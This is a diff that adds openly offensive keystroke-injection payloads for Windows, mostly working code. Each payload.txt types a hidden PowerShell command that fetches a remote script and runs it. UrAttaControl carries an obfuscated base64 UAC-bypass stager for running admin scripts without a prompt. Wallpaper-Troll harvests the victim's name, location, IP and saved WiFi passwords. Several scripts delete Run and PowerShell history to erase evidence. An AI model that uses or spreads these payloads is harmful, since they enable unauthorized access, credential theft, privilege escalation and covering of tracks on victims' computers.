+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-PineApple)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+
+
+(back to top)
diff --git a/Payloads/Flip-PineApple/payload.txt b/Payloads/Flip-PineApple/payload.txt
new file mode 100644
index 0000000..5377783
--- /dev/null
+++ b/Payloads/Flip-PineApple/payload.txt
@@ -0,0 +1,17 @@
+REM Title: OMG-PineApple
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
+REM This version of the payload is executed using an invoke web-request to download and execute the file to add the PineApple's network profile
+REM The powershell script needed is provided as OMG-PineApple.ps1
+REM
+REM Target: Windows 10, 11
+REM
+REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
diff --git a/Payloads/Flip-Play-WAV/Play-WAV.ps1 b/Payloads/Flip-Play-WAV/Play-WAV.ps1
new file mode 100644
index 0000000..687e4a3
--- /dev/null
+++ b/Payloads/Flip-Play-WAV/Play-WAV.ps1
@@ -0,0 +1,89 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ This script requires you to have a DropBox account or another file hosting service
+
+.DESCRIPTION
+ This program downloads a sound from your DropBox
+ Turns the volume to max level on victims PC
+ Pauses the script until a mouse movement is detected
+ Then plays the sound with nothing popping up catching your victim off guard
+ Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history
+
+#>
+
+############################################################################################################################################################
+
+# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1")
+iwr https:// ?dl=1 -O $env:TMP\e.wav
+
+############################################################################################################################################################
+
+# This turns the volume up to max level
+$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
+
+############################################################################################################################################################
+
+# This while loop will constantly check if the mouse has been moved
+# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off
+# it will then sleep for the indicated number of seconds and check again
+
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+############################################################################################################################################################
+
+# Play Sound
+$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync()
+
+############################################################################################################################################################
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
diff --git a/Payloads/Flip-Play-WAV/README.md b/Payloads/Flip-Play-WAV/README.md
new file mode 100644
index 0000000..ee80aa7
--- /dev/null
+++ b/Payloads/Flip-Play-WAV/README.md
@@ -0,0 +1,99 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Play-WAV
+
+A script used to download a WAV file and play it after a mouse movement is detected
+
+## Description
+
+This program starts off by using an Invoke-WebRequest to download a WAV file
+The system volume is then turned up to the max level
+Then the script will be paused until a mouse movement is detected
+After one is the WAV file will be played
+
+## Getting Started
+
+### Dependencies
+
+* DropBox - Your Shared link for the intended file
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download your WAV file
+```
+powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-Play-WAV)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+
+(back to top)
diff --git a/Payloads/Flip-Play-WAV/payload.txt b/Payloads/Flip-Play-WAV/payload.txt
new file mode 100644
index 0000000..b66f18f
--- /dev/null
+++ b/Payloads/Flip-Play-WAV/payload.txt
@@ -0,0 +1,16 @@
+REM Title: Play-WAV
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details
+REM
+REM Target: Windows 10, 11
+REM
+REM Remeber to replace the link with your link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+DELAY 500
+ENTER
diff --git a/Payloads/Flip-Rage-PopUps/README.md b/Payloads/Flip-Rage-PopUps/README.md
new file mode 100644
index 0000000..c434cca
--- /dev/null
+++ b/Payloads/Flip-Rage-PopUps/README.md
@@ -0,0 +1,97 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Rage-PopUps
+
+A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
+
+## Description
+
+This program will open a series of pop up boxes with insults in a loop that repeats as many times as you set it to.
+There is a section in the Rage-PopUps.ps1 file where you insert your own insults or use the ones provided
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file hosting service - Your Shared link for the intended file
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-Rage-PopUps)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+
+(back to top)
diff --git a/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 b/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1
new file mode 100644
index 0000000..cab90f1
--- /dev/null
+++ b/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1
@@ -0,0 +1,75 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Rage-PopUps | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This script will open a series of pop ups in order to taunt your target. I wrote it initially to target call center scammers
+
+.DESCRIPTION
+ This program is to taunt your target. Below are a series insults you can modify as you like. The program will generate a PopUp
+ for each one of them.
+#>
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+Add-Type -AssemblyName System.Windows.Forms
+
+# The number of times you want it to cycle through your list of questions
+
+$cycles = 3
+
+# List as many questions here as you like, it will cycke through all of them
+
+$msgs = @(
+"Are all scammers as dumb as you?"
+"Is the pay worth being this big of a loser?"
+"Do your parents know what you do for a living?"
+"Does you boss know much much you suck at this job?"
+)
+
+for ($i=1; $i -le $cycles; $i++) {
+
+Foreach ($msg in $msgs) {
+[System.Windows.Forms.MessageBox]::Show($msg , "You're-a-Loser.exe" , 4 , 'Question')
+}
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
diff --git a/Payloads/Flip-Rage-PopUps/payload.txt b/Payloads/Flip-Rage-PopUps/payload.txt
new file mode 100644
index 0000000..bdb3c2f
--- /dev/null
+++ b/Payloads/Flip-Rage-PopUps/payload.txt
@@ -0,0 +1,16 @@
+REM Title: Rage-PopUps
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to make a never ending supply of taunting pop-ups. See Rage-PopUps.ps1 for more details
+REM
+REM Target: Windows 10, 11
+REM
+REM Remeber to replace the link with your link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+DELAY 500
+ENTER
diff --git a/Payloads/Flip-Subscribe/README.md b/Payloads/Flip-Subscribe/README.md
new file mode 100644
index 0000000..ce39664
--- /dev/null
+++ b/Payloads/Flip-Subscribe/README.md
@@ -0,0 +1,93 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Subscribe
+
+A script I put together to make your target subscribe to your youtube channel
+
+## Description
+
+This script is set to open your youtube account in their browser where they will be prompted to subscribe to you.
+SPOILER: They do.
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+* Your target will have to be signed into their youtube account
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* 15 seconds later you have a new subscriber
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-Subscribe)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/Flip-Subscribe/Subscribe.ps1 b/Payloads/Flip-Subscribe/Subscribe.ps1
new file mode 100644
index 0000000..f5cba26
--- /dev/null
+++ b/Payloads/Flip-Subscribe/Subscribe.ps1
@@ -0,0 +1,38 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Subscribe | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : General | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.DESCRIPTION
+ This program is designed to get your target to subscribe to your youtube channel
+#>
+#############################################################################################################################################
+
+# Enter your youtube channel URL here, but you should test this script with my URL first ;D
+
+$channel = "https://www.youtube.com/iamjakoby"
+
+Add-Type -AssemblyName System.Windows.Forms
+$o=New-Object -ComObject WScript.Shell
+$url = -join($channel,"?sub_confirmation=1")
+Start-Process $url
+Start-Sleep -Seconds 3
+[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)
+[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')
+Start-Sleep -Seconds 1
+[System.Windows.Forms.SendKeys]::SendWait('%{F4}')
diff --git a/Payloads/Flip-Subscribe/Subscribe.txt b/Payloads/Flip-Subscribe/Subscribe.txt
new file mode 100644
index 0000000..1e78bc4
--- /dev/null
+++ b/Payloads/Flip-Subscribe/Subscribe.txt
@@ -0,0 +1,32 @@
+REM Title: OMG-Subscribe
+REM Description: This payload is meant to get the owner of the target PC to subscribe to your youtube channel
+REM Author: I am Jakoby
+REM Target: Windows 10, 11
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass Start-Process "
+REM
+REM put your youtube link here, you should test it out with mine first though ;D
+STRING https://www.youtube.com/iamjakoby
+REM
+STRING ?sub_confirmation=1"
+DELAY 500
+ENTER
+DELAY 3000
+TAB
+DELAY 1000
+TAB
+DELAY 1000
+ENTER
+DELAY 500
+ALT F4
+DELAY 1000
+GUI r
+DELAY 500
+REM
+REM This will clear their powershell and runbox history
+REM
+STRING powershell -w h -NoP -NonI -Exec Bypass reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath
+DELAY 500
+ENTER
diff --git a/Payloads/Flip-Subscribe/payload.txt b/Payloads/Flip-Subscribe/payload.txt
new file mode 100644
index 0000000..6161f32
--- /dev/null
+++ b/Payloads/Flip-Subscribe/payload.txt
@@ -0,0 +1,16 @@
+REM Title: Subscribe
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to make your target subscribe to your youtube channel
+REM
+REM Target: Windows 10, 11
+REM
+REM Remember to replace the link with your link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
diff --git a/Payloads/Flip-UrAttaControl/README.md b/Payloads/Flip-UrAttaControl/README.md
new file mode 100644
index 0000000..866fedf
--- /dev/null
+++ b/Payloads/Flip-UrAttaControl/README.md
@@ -0,0 +1,104 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# UrAttaControl
+
+A script used to open an elevated powershell console and execute admin level commands
+
+## Description
+
+Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script
+
+This script will use IEX to download a base64 script to the $Payload variable
+
+Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64
+
+script saved in the $Payload variable
+
+This payload completely bypasses the UAC and will run any admin level script without a prompt
+
+You can use this function I wrote to convert your .ps1 sscripts to Base64
+
+https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* A keystroke injection based payload will run
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-UrAttaControl)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/Flip-UrAttaControl/UrAttaControl-Execute.txt b/Payloads/Flip-UrAttaControl/UrAttaControl-Execute.txt
new file mode 100644
index 0000000..091f6e4
--- /dev/null
+++ b/Payloads/Flip-UrAttaControl/UrAttaControl-Execute.txt
@@ -0,0 +1,30 @@
+REM Title: UrAttaControl
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
+REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
+REM
+REM Target: Windows 10, 11
+REM
+REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
+REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
+REM
+REM You can use this function I wrote to convert your .ps1 sscripts to Base64
+REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
+REM
+GUI r
+DELAY 500
+STRING powershell
+ENTER
+REM
+DELAY 1000
+REM
+STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
+SHIFT ENTER
+STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content
+SHIFT ENTER
+STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
+SHIFT ENTER
+STRING exit
+ENTER
diff --git a/Payloads/Flip-Wallpaper-Troll/README.md b/Payloads/Flip-Wallpaper-Troll/README.md
new file mode 100644
index 0000000..557cadd
--- /dev/null
+++ b/Payloads/Flip-Wallpaper-Troll/README.md
@@ -0,0 +1,99 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Wallpaper-Troll
+
+A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
+
+## Description
+
+This program enumerates a target PC to get their Name, GeoLocation (Latitude and Longitude), Public IP, Day password was last set, and wifi passwords
+This information will be saved to a file that is then converted to a .BMP image
+That image will be saved to their desktop and saved as their wallpaper
+Opening the image on their desktop with NotePad will reveal the binary code with a hidden message at the bottom of the file
+
+
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-Wallpaper-Troll/Wallpaper-Troll.ps1?dl=1?dl=1; invoke-expression $pl
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-Wallpaper-Troll)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1
new file mode 100644
index 0000000..9e758a2
--- /dev/null
+++ b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1
@@ -0,0 +1,412 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Wallpaper-Troll | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+
+.DESCRIPTION
+ This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude,
+ Public IP, and and the SSID and WiFi password of any current or previously connected to networks.
+ It will take the gathered information and generate a .jpg with that information on show
+ Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned
+ Additionally a secret message will be left in the binary of the wallpaper image generated and left on their desktop
+#>
+#############################################################################################################################################
+
+# this is the message that will be coded into the image you use as the wallpaper
+
+$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
+
+# this will be the name of the image you use as the wallpaper
+
+$ImageName = "dont-be-suspicious"
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will get the name associated with the microsoft account
+#>
+
+ function Get-Name {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$fn = Get-Name
+
+echo "Hey" $fn >> $Env:temp\foo.txt
+
+echo "`nYour computer is not very secure" >> $Env:temp\foo.txt
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This is to get the current Latitide and Longitude of your target
+#>
+
+function Get-GeoLocation{
+ try {
+ Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
+ $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
+ $GeoWatcher.Start() #Begin resolving current locaton
+
+ while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
+ Start-Sleep -Milliseconds 100 #Wait for discovery.
+ }
+
+ if ($GeoWatcher.Permission -eq 'Denied'){
+ Write-Error 'Access Denied for Location Information'
+ } else {
+ $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
+
+ }
+ }
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No coordinates found"
+ return "No Coordinates found"
+ -ErrorAction SilentlyContinue
+ }
+
+}
+
+$GL = Get-GeoLocation
+if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt }
+
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will get the public IP from the target computer
+#>
+
+
+function Get-PubIP {
+
+ try {
+
+ $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
+
+ }
+
+ # If no Public IP is detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No Public IP was detected"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+
+ return $computerPubIP
+}
+
+$PubIP = Get-PubIP
+if ($PubIP) { echo "`nYour Public IP: $PubIP" >> $Env:temp\foo.txt }
+
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Password last Set
+ This function will custom tailor a response based on how long it has been since they last changed their password
+#>
+
+
+ function Get-Days_Set {
+
+ #-----VARIABLES-----#
+ # $pls (password last set) = the date/time their password was last changed
+ # $days = the number of days since their password was last changed
+
+ try {
+
+ $pls = net user $env:USERNAME | Select-String -Pattern "Password last" ; $pls = [string]$pls
+ $plsPOS = $pls.IndexOf("e")
+ $pls = $pls.Substring($plsPOS+2).Trim()
+ $pls = $pls -replace ".{3}$"
+ $time = ((get-date) - (get-date "$pls")) ; $time = [string]$time
+ $DateArray =$time.Split(".")
+ $days = [int]$DateArray[0]
+ return $pls
+
+ }
+
+ # If no password set date is detected funtion will return $null to cancel Sapi Speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "Day password set not found"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+}
+
+$pls = Get-Days_Set
+if ($pls) { echo "`nPassword Last Set: $pls" >> $Env:temp\foo.txt }
+
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ All Wifi Networks and Passwords
+ This function will gather all current Networks and Passwords saved on the target computer
+ They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
+#>
+
+
+# Get Network Interfaces
+$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
+
